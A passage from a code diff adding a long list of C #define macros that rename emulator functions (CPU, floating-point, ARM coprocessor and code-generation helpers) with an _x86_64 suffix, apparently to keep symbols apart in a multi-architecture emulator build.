ccsidr_read_x86_64 +#define check_ap check_ap_x86_64 +#define check_breakpoints check_breakpoints_x86_64 +#define check_watchpoints check_watchpoints_x86_64 +#define cho cho_x86_64 +#define clear_bit clear_bit_x86_64 +#define clz32 clz32_x86_64 +#define clz64 clz64_x86_64 +#define cmp_flatrange_addr cmp_flatrange_addr_x86_64 +#define code_gen_alloc code_gen_alloc_x86_64 +#define commonNaNToFloat128 commonNaNToFloat128_x86_64 +#define commonNaNToFloat16 commonNaNToFloat16_x86_64 +#define commonNaNToFloat32 commonNaNToFloat32_x86_64 +#define commonNaNToFloat64 commonNaNToFloat64_x86_64 +#define commonNaNToFloatx80 commonNaNToFloatx80_x86_64 +#define compute_abs_deadline compute_abs_deadline_x86_64 +#define cond_name cond_name_x86_64 +#define configure_accelerator configure_accelerator_x86_64 +#define container_get container_get_x86_64 +#define container_info container_info_x86_64 +#define container_register_types container_register_types_x86_64 +#define contextidr_write contextidr_write_x86_64 +#define 
core_log_global_start core_log_global_start_x86_64 +#define core_log_global_stop core_log_global_stop_x86_64 +#define core_memory_listener core_memory_listener_x86_64 +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_x86_64 +#define cortex_a15_initfn cortex_a15_initfn_x86_64 +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_x86_64 +#define cortex_a8_initfn cortex_a8_initfn_x86_64 +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_x86_64 +#define cortex_a9_initfn cortex_a9_initfn_x86_64 +#define cortex_m3_initfn cortex_m3_initfn_x86_64 +#define count_cpreg count_cpreg_x86_64 +#define countLeadingZeros32 countLeadingZeros32_x86_64 +#define countLeadingZeros64 countLeadingZeros64_x86_64 +#define cp_access_ok cp_access_ok_x86_64 +#define cpacr_write cpacr_write_x86_64 +#define cpreg_field_is_64bit cpreg_field_is_64bit_x86_64 +#define cp_reginfo cp_reginfo_x86_64 +#define cpreg_key_compare cpreg_key_compare_x86_64 +#define cpreg_make_keylist cpreg_make_keylist_x86_64 +#define cp_reg_reset cp_reg_reset_x86_64 +#define cpreg_to_kvm_id cpreg_to_kvm_id_x86_64 +#define cpsr_read cpsr_read_x86_64 +#define cpsr_write cpsr_write_x86_64 +#define cptype_valid cptype_valid_x86_64 +#define cpu_abort cpu_abort_x86_64 +#define cpu_arm_exec cpu_arm_exec_x86_64 +#define cpu_arm_gen_code cpu_arm_gen_code_x86_64 +#define cpu_arm_init cpu_arm_init_x86_64 +#define cpu_breakpoint_insert cpu_breakpoint_insert_x86_64 +#define cpu_breakpoint_remove cpu_breakpoint_remove_x86_64 +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_x86_64 +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_x86_64 +#define cpu_can_do_io cpu_can_do_io_x86_64 +#define cpu_can_run cpu_can_run_x86_64 +#define cpu_class_init cpu_class_init_x86_64 +#define cpu_common_class_by_name cpu_common_class_by_name_x86_64 +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_x86_64 +#define cpu_common_get_arch_id cpu_common_get_arch_id_x86_64 +#define cpu_common_get_memory_mapping 
cpu_common_get_memory_mapping_x86_64 +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_x86_64 +#define cpu_common_has_work cpu_common_has_work_x86_64 +#define cpu_common_initfn cpu_common_initfn_x86_64 +#define cpu_common_noop cpu_common_noop_x86_64 +#define cpu_common_parse_features cpu_common_parse_features_x86_64 +#define cpu_common_realizefn cpu_common_realizefn_x86_64 +#define cpu_common_reset cpu_common_reset_x86_64 +#define cpu_dump_statistics cpu_dump_statistics_x86_64 +#define cpu_exec_init cpu_exec_init_x86_64 +#define cpu_flush_icache_range cpu_flush_icache_range_x86_64 +#define cpu_gen_init cpu_gen_init_x86_64 +#define cpu_get_clock cpu_get_clock_x86_64 +#define cpu_get_real_ticks cpu_get_real_ticks_x86_64 +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_x86_64 +#define cpu_handle_debug_exception cpu_handle_debug_exception_x86_64 +#define cpu_handle_guest_debug cpu_handle_guest_debug_x86_64 +#define cpu_inb cpu_inb_x86_64 +#define cpu_inl cpu_inl_x86_64 +#define cpu_interrupt cpu_interrupt_x86_64 +#define cpu_interrupt_handler cpu_interrupt_handler_x86_64 +#define cpu_inw cpu_inw_x86_64 +#define cpu_io_recompile cpu_io_recompile_x86_64 +#define cpu_is_stopped cpu_is_stopped_x86_64 +#define cpu_ldl_code cpu_ldl_code_x86_64 +#define cpu_ldub_code cpu_ldub_code_x86_64 +#define cpu_lduw_code cpu_lduw_code_x86_64 +#define cpu_memory_rw_debug cpu_memory_rw_debug_x86_64 +#define cpu_mmu_index cpu_mmu_index_x86_64 +#define cpu_outb cpu_outb_x86_64 +#define cpu_outl cpu_outl_x86_64 +#define cpu_outw cpu_outw_x86_64 +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_x86_64 +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_x86_64 +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_x86_64 +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_x86_64 +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_x86_64 +#define 
cpu_physical_memory_is_io cpu_physical_memory_is_io_x86_64 +#define cpu_physical_memory_map cpu_physical_memory_map_x86_64 +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_x86_64 +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_x86_64 +#define cpu_physical_memory_rw cpu_physical_memory_rw_x86_64 +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_x86_64 +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_x86_64 +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_x86_64 +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_x86_64 +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_x86_64 +#define cpu_register cpu_register_x86_64 +#define cpu_register_types cpu_register_types_x86_64 +#define cpu_restore_state cpu_restore_state_x86_64 +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_x86_64 +#define cpu_single_step cpu_single_step_x86_64 +#define cpu_tb_exec cpu_tb_exec_x86_64 +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_x86_64 +#define cpu_to_be64 cpu_to_be64_x86_64 +#define cpu_to_le32 cpu_to_le32_x86_64 +#define cpu_to_le64 cpu_to_le64_x86_64 +#define cpu_type_info cpu_type_info_x86_64 +#define cpu_unassigned_access cpu_unassigned_access_x86_64 +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_x86_64 +#define cpu_watchpoint_insert cpu_watchpoint_insert_x86_64 +#define cpu_watchpoint_remove cpu_watchpoint_remove_x86_64 +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_x86_64 +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_x86_64 +#define crc32c_table crc32c_table_x86_64 +#define create_new_memory_mapping create_new_memory_mapping_x86_64 +#define csselr_write csselr_write_x86_64 +#define cto32 cto32_x86_64 +#define ctr_el0_access ctr_el0_access_x86_64 +#define ctz32 ctz32_x86_64 +#define ctz64 ctz64_x86_64 +#define 
dacr_write dacr_write_x86_64 +#define dbgbcr_write dbgbcr_write_x86_64 +#define dbgbvr_write dbgbvr_write_x86_64 +#define dbgwcr_write dbgwcr_write_x86_64 +#define dbgwvr_write dbgwvr_write_x86_64 +#define debug_cp_reginfo debug_cp_reginfo_x86_64 +#define debug_frame debug_frame_x86_64 +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_x86_64 +#define define_arm_cp_regs define_arm_cp_regs_x86_64 +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_x86_64 +#define define_debug_regs define_debug_regs_x86_64 +#define define_one_arm_cp_reg define_one_arm_cp_reg_x86_64 +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_x86_64 +#define deposit32 deposit32_x86_64 +#define deposit64 deposit64_x86_64 +#define deregister_tm_clones deregister_tm_clones_x86_64 +#define device_class_base_init device_class_base_init_x86_64 +#define device_class_init device_class_init_x86_64 +#define device_finalize device_finalize_x86_64 +#define device_get_realized device_get_realized_x86_64 +#define device_initfn device_initfn_x86_64 +#define device_post_init device_post_init_x86_64 +#define device_reset device_reset_x86_64 +#define device_set_realized device_set_realized_x86_64 +#define device_type_info device_type_info_x86_64 +#define disas_arm_insn disas_arm_insn_x86_64 +#define disas_coproc_insn disas_coproc_insn_x86_64 +#define disas_dsp_insn disas_dsp_insn_x86_64 +#define disas_iwmmxt_insn disas_iwmmxt_insn_x86_64 +#define disas_neon_data_insn disas_neon_data_insn_x86_64 +#define disas_neon_ls_insn disas_neon_ls_insn_x86_64 +#define disas_thumb2_insn disas_thumb2_insn_x86_64 +#define disas_thumb_insn disas_thumb_insn_x86_64 +#define disas_vfp_insn disas_vfp_insn_x86_64 +#define disas_vfp_v8_insn disas_vfp_v8_insn_x86_64 +#define do_arm_semihosting do_arm_semihosting_x86_64 +#define do_clz16 do_clz16_x86_64 +#define do_clz8 do_clz8_x86_64 +#define do_constant_folding do_constant_folding_x86_64 +#define do_constant_folding_2 
do_constant_folding_2_x86_64 +#define do_constant_folding_cond do_constant_folding_cond_x86_64 +#define do_constant_folding_cond2 do_constant_folding_cond2_x86_64 +#define do_constant_folding_cond_32 do_constant_folding_cond_32_x86_64 +#define do_constant_folding_cond_64 do_constant_folding_cond_64_x86_64 +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_x86_64 +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_x86_64 +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_x86_64 +#define do_ssat do_ssat_x86_64 +#define do_usad do_usad_x86_64 +#define do_usat do_usat_x86_64 +#define do_v7m_exception_exit do_v7m_exception_exit_x86_64 +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_x86_64 +#define dummy_func dummy_func_x86_64 +#define dummy_section dummy_section_x86_64 +#define _DYNAMIC _DYNAMIC_x86_64 +#define _edata _edata_x86_64 +#define _end _end_x86_64 +#define end_list end_list_x86_64 +#define eq128 eq128_x86_64 +#define ErrorClass_lookup ErrorClass_lookup_x86_64 +#define error_copy error_copy_x86_64 +#define error_exit error_exit_x86_64 +#define error_get_class error_get_class_x86_64 +#define error_get_pretty error_get_pretty_x86_64 +#define error_setg_file_open error_setg_file_open_x86_64 +#define estimateDiv128To64 estimateDiv128To64_x86_64 +#define estimateSqrt32 estimateSqrt32_x86_64 +#define excnames excnames_x86_64 +#define excp_is_internal excp_is_internal_x86_64 +#define extended_addresses_enabled extended_addresses_enabled_x86_64 +#define extended_mpu_ap_bits extended_mpu_ap_bits_x86_64 +#define extract32 extract32_x86_64 +#define extract64 extract64_x86_64 +#define extractFloat128Exp extractFloat128Exp_x86_64 +#define extractFloat128Frac0 extractFloat128Frac0_x86_64 +#define extractFloat128Frac1 extractFloat128Frac1_x86_64 +#define extractFloat128Sign extractFloat128Sign_x86_64 +#define extractFloat16Exp extractFloat16Exp_x86_64 +#define extractFloat16Frac extractFloat16Frac_x86_64 +#define extractFloat16Sign extractFloat16Sign_x86_64 +#define 
extractFloat32Exp extractFloat32Exp_x86_64 +#define extractFloat32Frac extractFloat32Frac_x86_64 +#define extractFloat32Sign extractFloat32Sign_x86_64 +#define extractFloat64Exp extractFloat64Exp_x86_64 +#define extractFloat64Frac extractFloat64Frac_x86_64 +#define extractFloat64Sign extractFloat64Sign_x86_64 +#define extractFloatx80Exp extractFloatx80Exp_x86_64 +#define extractFloatx80Frac extractFloatx80Frac_x86_64 +#define extractFloatx80Sign extractFloatx80Sign_x86_64 +#define fcse_write fcse_write_x86_64 +#define find_better_copy find_better_copy_x86_64 +#define find_default_machine find_default_machine_x86_64 +#define find_desc_by_name find_desc_by_name_x86_64 +#define find_first_bit find_first_bit_x86_64 +#define find_paging_enabled_cpu find_paging_enabled_cpu_x86_64 +#define find_ram_block find_ram_block_x86_64 +#define find_ram_offset find_ram_offset_x86_64 +#define find_string find_string_x86_64 +#define find_type find_type_x86_64 +#define _fini _fini_x86_64 +#define flatrange_equal flatrange_equal_x86_64 +#define flatview_destroy flatview_destroy_x86_64 +#define flatview_init flatview_init_x86_64 +#define flatview_insert flatview_insert_x86_64 +#define flatview_lookup flatview_lookup_x86_64 +#define flatview_ref flatview_ref_x86_64 +#define flatview_simplify flatview_simplify_x86_64 +#define flatview_unref flatview_unref_x86_64 +#define float128_add float128_add_x86_64 +#define float128_compare float128_compare_x86_64 +#define float128_compare_internal float128_compare_internal_x86_64 +#define float128_compare_quiet float128_compare_quiet_x86_64 +#define float128_default_nan float128_default_nan_x86_64 +#define float128_div float128_div_x86_64 +#define float128_eq float128_eq_x86_64 +#define float128_eq_quiet float128_eq_quiet_x86_64 +#define float128_is_quiet_nan float128_is_quiet_nan_x86_64 +#define float128_is_signaling_nan float128_is_signaling_nan_x86_64 +#define float128_le float128_le_x86_64 +#define float128_le_quiet float128_le_quiet_x86_64 
+#define float128_lt float128_lt_x86_64 +#define float128_lt_quiet float128_lt_quiet_x86_64 +#define float128_maybe_silence_nan float128_maybe_silence_nan_x86_64 +#define float128_mul float128_mul_x86_64 +#define float128_rem float128_rem_x86_64 +#define float128_round_to_int float128_round_to_int_x86_64 +#define float128_scalbn float128_scalbn_x86_64 +#define float128_sqrt float128_sqrt_x86_64 +#define float128_sub float128_sub_x86_64 +#define float128ToCommonNaN float128ToCommonNaN_x86_64 +#define float128_to_float32 float128_to_float32_x86_64 +#define float128_to_float64 float128_to_float64_x86_64 +#define float128_to_floatx80 float128_to_floatx80_x86_64 +#define float128_to_int32 float128_to_int32_x86_64 +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_x86_64 +#define float128_to_int64 float128_to_int64_x86_64 +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_x86_64 +#define float128_unordered float128_unordered_x86_64 +#define float128_unordered_quiet float128_unordered_quiet_x86_64 +#define float16_default_nan float16_default_nan_x86_64 +#define float16_is_quiet_nan float16_is_quiet_nan_x86_64 +#define float16_is_signaling_nan float16_is_signaling_nan_x86_64 +#define float16_maybe_silence_nan float16_maybe_silence_nan_x86_64 +#define float16ToCommonNaN float16ToCommonNaN_x86_64 +#define float16_to_float32 float16_to_float32_x86_64 +#define float16_to_float64 float16_to_float64_x86_64 +#define float32_abs float32_abs_x86_64 +#define float32_add float32_add_x86_64 +#define float32_chs float32_chs_x86_64 +#define float32_compare float32_compare_x86_64 +#define float32_compare_internal float32_compare_internal_x86_64 +#define float32_compare_quiet float32_compare_quiet_x86_64 +#define float32_default_nan float32_default_nan_x86_64 +#define float32_div float32_div_x86_64 +#define float32_eq float32_eq_x86_64 +#define float32_eq_quiet float32_eq_quiet_x86_64 +#define float32_exp2 float32_exp2_x86_64 +#define 
float32_exp2_coefficients float32_exp2_coefficients_x86_64 +#define float32_is_any_nan float32_is_any_nan_x86_64 +#define float32_is_infinity float32_is_infinity_x86_64 +#define float32_is_neg float32_is_neg_x86_64 +#define float32_is_quiet_nan float32_is_quiet_nan_x86_64 +#define float32_is_signaling_nan float32_is_signaling_nan_x86_64 +#define float32_is_zero float32_is_zero_x86_64 +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_x86_64 +#define float32_le float32_le_x86_64 +#define float32_le_quiet float32_le_quiet_x86_64 +#define float32_log2 float32_log2_x86_64 +#define float32_lt float32_lt_x86_64 +#define float32_lt_quiet float32_lt_quiet_x86_64 +#define float32_max float32_max_x86_64 +#define float32_maxnum float32_maxnum_x86_64 +#define float32_maxnummag float32_maxnummag_x86_64 +#define float32_maybe_silence_nan float32_maybe_silence_nan_x86_64 +#define float32_min float32_min_x86_64 +#define float32_minmax float32_minmax_x86_64 +#define float32_minnum float32_minnum_x86_64 +#define float32_minnummag float32_minnummag_x86_64 +#define float32_mul float32_mul_x86_64 +#define float32_muladd float32_muladd_x86_64 +#define float32_rem float32_rem_x86_64 +#define float32_round_to_int float32_round_to_int_x86_64 +#define float32_scalbn float32_scalbn_x86_64 +#define float32_set_sign float32_set_sign_x86_64 +#define float32_sqrt float32_sqrt_x86_64 +#define float32_squash_input_denormal float32_squash_input_denormal_x86_64 +#define float32_sub float32_sub_x86_64 +#define float32ToCommonNaN float32ToCommonNaN_x86_64 +#define float32_to_float128 float32_to_float128_x86_64 +#define float32_to_float16 float32_to_float16_x86_64 +#define float32_to_float64 float32_to_float64_x86_64 +#define float32_to_floatx80 float32_to_floatx80_x86_64 +#define float32_to_int16 float32_to_int16_x86_64 +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_x86_64 +#define float32_to_int32 float32_to_int32_x86_64 +#define float32_to_int32_round_to_zero 
float32_to_int32_round_to_zero_x86_64 +#define float32_to_int64 float32_to_int64_x86_64 +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_x86_64 +#define float32_to_uint16 float32_to_uint16_x86_64 +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_x86_64 +#define float32_to_uint32 float32_to_uint32_x86_64 +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_x86_64 +#define float32_to_uint64 float32_to_uint64_x86_64 +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_x86_64 +#define float32_unordered float32_unordered_x86_64 +#define float32_unordered_quiet float32_unordered_quiet_x86_64 +#define float64_abs float64_abs_x86_64 +#define float64_add float64_add_x86_64 +#define float64_chs float64_chs_x86_64 +#define float64_compare float64_compare_x86_64 +#define float64_compare_internal float64_compare_internal_x86_64 +#define float64_compare_quiet float64_compare_quiet_x86_64 +#define float64_default_nan float64_default_nan_x86_64 +#define float64_div float64_div_x86_64 +#define float64_eq float64_eq_x86_64 +#define float64_eq_quiet float64_eq_quiet_x86_64 +#define float64_is_any_nan float64_is_any_nan_x86_64 +#define float64_is_infinity float64_is_infinity_x86_64 +#define float64_is_neg float64_is_neg_x86_64 +#define float64_is_quiet_nan float64_is_quiet_nan_x86_64 +#define float64_is_signaling_nan float64_is_signaling_nan_x86_64 +#define float64_is_zero float64_is_zero_x86_64 +#define float64_le float64_le_x86_64 +#define float64_le_quiet float64_le_quiet_x86_64 +#define float64_log2 float64_log2_x86_64 +#define float64_lt float64_lt_x86_64 +#define float64_lt_quiet float64_lt_quiet_x86_64 +#define float64_max float64_max_x86_64 +#define float64_maxnum float64_maxnum_x86_64 +#define float64_maxnummag float64_maxnummag_x86_64 +#define float64_maybe_silence_nan float64_maybe_silence_nan_x86_64 +#define float64_min float64_min_x86_64 +#define float64_minmax float64_minmax_x86_64 
+#define float64_minnum float64_minnum_x86_64 +#define float64_minnummag float64_minnummag_x86_64 +#define float64_mul float64_mul_x86_64 +#define float64_muladd float64_muladd_x86_64 +#define float64_rem float64_rem_x86_64 +#define float64_round_to_int float64_round_to_int_x86_64 +#define float64_scalbn float64_scalbn_x86_64 +#define float64_set_sign float64_set_sign_x86_64 +#define float64_sqrt float64_sqrt_x86_64 +#define float64_squash_input_denormal float64_squash_input_denormal_x86_64 +#define float64_sub float64_sub_x86_64 +#define float64ToCommonNaN float64ToCommonNaN_x86_64 +#define float64_to_float128 float64_to_float128_x86_64 +#define float64_to_float16 float64_to_float16_x86_64 +#define float64_to_float32 float64_to_float32_x86_64 +#define float64_to_floatx80 float64_to_floatx80_x86_64 +#define float64_to_int16 float64_to_int16_x86_64 +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_x86_64 +#define float64_to_int32 float64_to_int32_x86_64 +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_x86_64 +#define float64_to_int64 float64_to_int64_x86_64 +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_x86_64 +#define float64_to_uint16 float64_to_uint16_x86_64 +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_x86_64 +#define float64_to_uint32 float64_to_uint32_x86_64 +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_x86_64 +#define float64_to_uint64 float64_to_uint64_x86_64 +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_x86_64 +#define float64_trunc_to_int float64_trunc_to_int_x86_64 +#define float64_unordered float64_unordered_x86_64 +#define float64_unordered_quiet float64_unordered_quiet_x86_64 +#define float_raise float_raise_x86_64 +#define floatx80_add floatx80_add_x86_64 +#define floatx80_compare floatx80_compare_x86_64 +#define floatx80_compare_internal floatx80_compare_internal_x86_64 +#define floatx80_compare_quiet 
floatx80_compare_quiet_x86_64 +#define floatx80_default_nan floatx80_default_nan_x86_64 +#define floatx80_div floatx80_div_x86_64 +#define floatx80_eq floatx80_eq_x86_64 +#define floatx80_eq_quiet floatx80_eq_quiet_x86_64 +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_x86_64 +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_x86_64 +#define floatx80_le floatx80_le_x86_64 +#define floatx80_le_quiet floatx80_le_quiet_x86_64 +#define floatx80_lt floatx80_lt_x86_64 +#define floatx80_lt_quiet floatx80_lt_quiet_x86_64 +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_x86_64 +#define floatx80_mul floatx80_mul_x86_64 +#define floatx80_rem floatx80_rem_x86_64 +#define floatx80_round_to_int floatx80_round_to_int_x86_64 +#define floatx80_scalbn floatx80_scalbn_x86_64 +#define floatx80_sqrt floatx80_sqrt_x86_64 +#define floatx80_sub floatx80_sub_x86_64 +#define floatx80ToCommonNaN floatx80ToCommonNaN_x86_64 +#define floatx80_to_float128 floatx80_to_float128_x86_64 +#define floatx80_to_float32 floatx80_to_float32_x86_64 +#define floatx80_to_float64 floatx80_to_float64_x86_64 +#define floatx80_to_int32 floatx80_to_int32_x86_64 +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_x86_64 +#define floatx80_to_int64 floatx80_to_int64_x86_64 +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_x86_64 +#define floatx80_unordered floatx80_unordered_x86_64 +#define floatx80_unordered_quiet floatx80_unordered_quiet_x86_64 +#define flush_icache_range flush_icache_range_x86_64 +#define format_string format_string_x86_64 +#define fp_decode_rm fp_decode_rm_x86_64 +#define frame_dummy frame_dummy_x86_64 +#define free_range free_range_x86_64 +#define fstat64 fstat64_x86_64 +#define futex_wait futex_wait_x86_64 +#define futex_wake futex_wake_x86_64 +#define gen_aa32_ld16s gen_aa32_ld16s_x86_64 +#define gen_aa32_ld16u gen_aa32_ld16u_x86_64 +#define gen_aa32_ld32u gen_aa32_ld32u_x86_64 +#define gen_aa32_ld64 gen_aa32_ld64_x86_64 
+#define gen_aa32_ld8s gen_aa32_ld8s_x86_64 +#define gen_aa32_ld8u gen_aa32_ld8u_x86_64 +#define gen_aa32_st16 gen_aa32_st16_x86_64 +#define gen_aa32_st32 gen_aa32_st32_x86_64 +#define gen_aa32_st64 gen_aa32_st64_x86_64 +#define gen_aa32_st8 gen_aa32_st8_x86_64 +#define gen_adc gen_adc_x86_64 +#define gen_adc_CC gen_adc_CC_x86_64 +#define gen_add16 gen_add16_x86_64 +#define gen_add_carry gen_add_carry_x86_64 +#define gen_add_CC gen_add_CC_x86_64 +#define gen_add_datah_offset gen_add_datah_offset_x86_64 +#define gen_add_data_offset gen_add_data_offset_x86_64 +#define gen_addq gen_addq_x86_64 +#define gen_addq_lo gen_addq_lo_x86_64 +#define gen_addq_msw gen_addq_msw_x86_64 +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_x86_64 +#define gen_arm_shift_im gen_arm_shift_im_x86_64 +#define gen_arm_shift_reg gen_arm_shift_reg_x86_64 +#define gen_bx gen_bx_x86_64 +#define gen_bx_im gen_bx_im_x86_64 +#define gen_clrex gen_clrex_x86_64 +#define generate_memory_topology generate_memory_topology_x86_64 +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_x86_64 +#define gen_exception gen_exception_x86_64 +#define gen_exception_insn gen_exception_insn_x86_64 +#define gen_exception_internal gen_exception_internal_x86_64 +#define gen_exception_internal_insn gen_exception_internal_insn_x86_64 +#define gen_exception_return gen_exception_return_x86_64 +#define gen_goto_tb gen_goto_tb_x86_64 +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_x86_64 +#define gen_helper_add_saturate gen_helper_add_saturate_x86_64 +#define gen_helper_add_setq gen_helper_add_setq_x86_64 +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_x86_64 +#define gen_helper_clz32 gen_helper_clz32_x86_64 +#define gen_helper_clz64 gen_helper_clz64_x86_64 +#define gen_helper_clz_arm gen_helper_clz_arm_x86_64 +#define gen_helper_cpsr_read gen_helper_cpsr_read_x86_64 +#define gen_helper_cpsr_write gen_helper_cpsr_write_x86_64 +#define gen_helper_crc32_arm 
gen_helper_crc32_arm_x86_64 +#define gen_helper_crc32c gen_helper_crc32c_x86_64 +#define gen_helper_crypto_aese gen_helper_crypto_aese_x86_64 +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_x86_64 +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_x86_64 +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_x86_64 +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_x86_64 +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_x86_64 +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_x86_64 +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_x86_64 +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_x86_64 +#define gen_helper_double_saturate gen_helper_double_saturate_x86_64 +#define gen_helper_exception_internal gen_helper_exception_internal_x86_64 +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_x86_64 +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_x86_64 +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_x86_64 +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_x86_64 +#define gen_helper_get_user_reg gen_helper_get_user_reg_x86_64 +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_x86_64 +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_x86_64 +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_x86_64 +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_x86_64 +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_x86_64 +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_x86_64 +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_x86_64 +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_x86_64 +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_x86_64 +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_x86_64 +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_x86_64 +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_x86_64 +#define gen_helper_iwmmxt_align 
gen_helper_iwmmxt_align_x86_64 +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_x86_64 +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_x86_64 +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_x86_64 +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_x86_64 +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_x86_64 +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_x86_64 +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_x86_64 +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_x86_64 +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_x86_64 +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_x86_64 +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_x86_64 +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_x86_64 +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_x86_64 +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_x86_64 +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_x86_64 +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_x86_64 +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_x86_64 +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_x86_64 +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_x86_64 +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_x86_64 +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_x86_64 +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_x86_64 +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_x86_64 +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_x86_64 +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_x86_64 +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_x86_64 +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_x86_64 +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_x86_64 +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_x86_64 +#define gen_helper_iwmmxt_minsw 